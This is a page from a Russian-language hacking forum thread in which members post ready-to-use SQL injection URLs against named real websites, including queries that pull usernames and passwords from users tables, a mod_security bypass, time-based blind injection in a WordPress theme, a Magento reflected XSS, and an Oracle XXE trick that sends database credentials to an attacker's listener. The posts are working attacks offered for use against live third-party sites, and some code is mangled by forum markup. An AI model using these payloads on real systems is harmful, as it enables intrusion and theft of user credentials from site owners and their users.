HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 06.01.2016, 17:50
AAI
Guest
Сообщений: n/a
Провел на форуме:
3616

Репутация: 1
По умолчанию

Цитата:
Сообщение от R3hab  
Парю проверять! Спасибо.
 
Ответить с цитированием

  #112  
Старый 22.01.2016, 23:46
nordwarrior
Guest
Сообщений: n/a
Провел на форуме:
4014

Репутация: 2
По умолчанию

SQL-i, обход mod_security

Код:
Code:
http://thewallis.org/showinfo.php?id=-1+/*!50000UNION+select+null,concat_ws%280x3a,TABLE_NAME,%20COLUMN_NAME%29+/**/FROM+/**/INFORMATION_SCHEMA.COLUMNS/**/+LIMIT+0,800*/
 
Ответить с цитированием

  #113  
Старый 17.02.2016, 17:28
lastbyte
Guest
Сообщений: n/a
Провел на форуме:
585

Репутация: 1
По умолчанию

 
Ответить с цитированием

  #114  
Старый 17.02.2016, 18:31
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

небольшие проблемы с хостингом и рейтингом, пока восстанавливаю
 
Ответить с цитированием

  #115  
Старый 19.02.2016, 23:07
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Сайт: http://www.bri.gov.md/panel/login.php

Уязвимость: Отменяем редирект

Эксплойт:

Сайт: http://www.stroika.md/

Уязвимость: SQL injection

Эксплойт:

Код:
Code:
http://www.stroika.md/detail.php?id=1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
Сайт: http://www.calidus.ro/

Уязвимость: SQL injection

Эксплойт:

Код:
Code:
http://www.calidus.ro/en/news.php?id=-1+UNION+SELECT+1%2Cusername%2C3%2Cuser_password+FROM+users
Сайт: http://lukoil.md/ro/search_result

Уязвимость: SQL injection (Post SQL-inj в поиске)

Эксплойт:

Код:
Code:
-1' UNION SELECT 1,2,user(),4,5,6 --
Сайт: http://mobile.airmoldova.md/

Уязвимость: SQL injection

Эксплойт:

Код:
Code:
http://mobile.airmoldova.md/special-offers-ru/?item=-9179)+UNION+SELECT+1,2,3,4,5,user_login,7,8,9,10,11,12,13,user_password,15,16,17,18,19,20,21,22,23,24,25+FROM+users+--+
Сайт: http://www.infocom.md/

Уязвимость: SQL injection

Эксплойт:

Код:
Code:
http://www.infocom.md/evenimente.php?id=13+UNION+SELECT+1,2,user(),version()+--+
Сайт: http://investigatii.md/

Уязвимость: SQL injection

Эксплойт:

Код:
Code:
http://investigatii.md/eng/comments.php?id=258+union+select+1,2,version(),user(),5,6,7,8,9,database(),11,12,13,14
 
Ответить с цитированием

  #116  
Старый 06.03.2016, 23:17
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Невидимая ЭскуЭль инъекция

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//parfume.in.ua/parfumes.php?Gabanna&designer=DG&designers=Dolce&sort=1+and+sleep(12)+--+-[/COLOR][/COLOR] 
АштиМиЭль Всовывание

[PHP]
PHP:
[COLOR="#000000"]http:[COLOR="#FF8000"]//shops.ixi.ua/goods.php?goods=hello
mir
 
Ответить с цитированием

  #117  
Старый 18.03.2016, 15:25
blacKK
Guest
Сообщений: n/a
Провел на форуме:
3428

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
select extractvalue(xmltype(']>'|| '&' ||'xxe;'),'/l') from dual;
Возникает следующая ошибка:
ORA-31020: The operation is not allowed,
Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31020. 00000 - "The operation is not allowed, Reason: %s"
*Cause: The operation attempted is not allowed
*Action: See reason and change to a valid operation.
select extractvalue(xmltype(' %remote; %param1;]>'),'/l') from dual;
При запуске запроса выше на сервере баз данных возникнет та же сама ошибка (ORA-31020). Однако в этот раз сервер отсылает HTTP-запрос на ресурс с именем «test». Ниже приведен лог HTTP-запросов с сервера злоумышленника:
ncat -lvp 80
Ncat: Version 6.25 (
http://nmap.org/ncat
)
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from DB_IP.
Ncat: Connection from DB_IP:27320.
GET /test HTTP/1.0
Host: DB_IP
Content-Type: text/plain; charset=utf-8
select extractvalue(xmltype(' %remote; %param1;]>'),'/l') from dual;
После запуска запроса возникает следующая ошибка (обратите внимание, что код ошибки отличается, поскольку предоставленные учетные данные не могут быть использованы для авторизации на удаленном FTP-сервере).
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00202: could not open "ftp://SYSTEM:bar@IP/test" (error 402)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31011. 00000 - "XML parsing failed"
*Cause: XML parser returned an error while trying to parse the document.
*Action: Check if the document to be parsed is valid.
Имя пользователя базы данных включено в FTP-трафик и отсылается на сервер злоумышленника как имя пользователя FTP-сервера:
СКРИН НЕ ВЫХОДИТ ЗАЛИТЬ ХЗ МОЖЕТ ПРАВ НЕ ХВАТАЕТ ....
 
Ответить с цитированием

  #118  
Старый 18.03.2016, 16:19
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Тема для Wordpress

Avada #1 Selling Theme of All Time
(190,000+ Satisfied Customers)

inurl:"product_orderby" (Результатов: примерно 8 840 000 (0,63 сек.))

./includes/woo-config.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ( isset([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] ) ) {
[/
COLOR][COLOR="#0000BB"]parse_str[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]);
}
[/
COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]= ! empty([/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'product_order'[/COLOR][COLOR="#007700"]] ) ?[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'product_order'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'desc'[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strtoupper[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'orderby'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]"sum_of_comments_approved DESC, average_rating[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]posts[/COLOR][COLOR="#DD0000"].post_date DESC"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR
Получается Time-Based Blind SQL Injection:

Цитата:
Сообщение от None  
http:// site.com/shop/?product_orderby=rating&product_order=DESC,CASE+1+ WHEN+ASCII(substring(version(),1,1))=53+THEN+SLEEP (0)+ELSE+SLEEP(1)+END+ASC+--+1
В тонкости не вдавался, похоже что спит так: количество сортируемых товаров * sleep(). Подверженные версии, скорее всего,
 
Ответить с цитированием

  #119  
Старый 18.03.2016, 17:59
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию



MagentoDownloader - 1.x

Reflected XSS



Код HTML:
HTML:

   
     
       
       
       
     
   
./downloader.php:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]public function[/COLOR][COLOR="#0000BB"]validateAction[/COLOR][COLOR="#007700"]()
{
...

if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'checkdb'[/COLOR][COLOR="#007700"]) {
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPost[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPost[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'database'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPost[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'database'[/COLOR][COLOR="#007700"]);

...

public function[/COLOR][COLOR="#0000BB"]getPost[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"])
{
if ([/COLOR][COLOR="#0000BB"]is_null[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"])) {
return[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"];
}
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]])) {
return[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]];
}
return[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"];
}
...

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]printHtmlValidateBlock[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_session[/COLOR][COLOR="#007700"]);

...

public function[/COLOR][COLOR="#0000BB"]printHtmlValidateBlock[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'localhost'[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]= !empty([/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#DD0000"]'******'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
echo

Database Connection
Database Connection

Host




User Name




User Password



[/COLOR][COLOR="#007700"]HTML;
echo[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]printHtmlButtonSet[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]'checkdb'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Check for InnoDB support'[/COLOR][COLOR="#007700"]));
echo

[/COLOR][COLOR="#007700"]HTML;
}
[/
COLOR][/COLOR
FPD

[QUOTE="None"]
Warning: PDO::__construct(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/downloader.php on line 191
Warning: PDO::__construct(): [2002] php_network_getaddresses: getaddrinfo failed: Name or service not known (trying to connect via tcp://">[/COLOR]_connection= newPDO($dsn,$username,$password);
} catch (
PDOException $e) {
$this->addError('Access denied for user '.$username.'@'.$host);
}
return
$this;
}

[/COLOR]
[/PHP]
 
Ответить с цитированием

  #120  
Старый 07.04.2016, 18:36
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от dmb_cv  
dmb_cv said:

sql inj
сайт dogarchive.kennel-apbt.com
называется найди уязвимость)?

читайте правила оформления постов

Сайт: http://pedigree.gamedogs.cz

Уязвимость: SQL Injection

Код:
Code:
http://pedigree.gamedogs.cz/managePerson.php?personId=-966+union+select+1,2,3,4,5,6,7,8,9,version%28%29,11,12+--+s
10.0.23-MariaDB-0+deb8u1
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ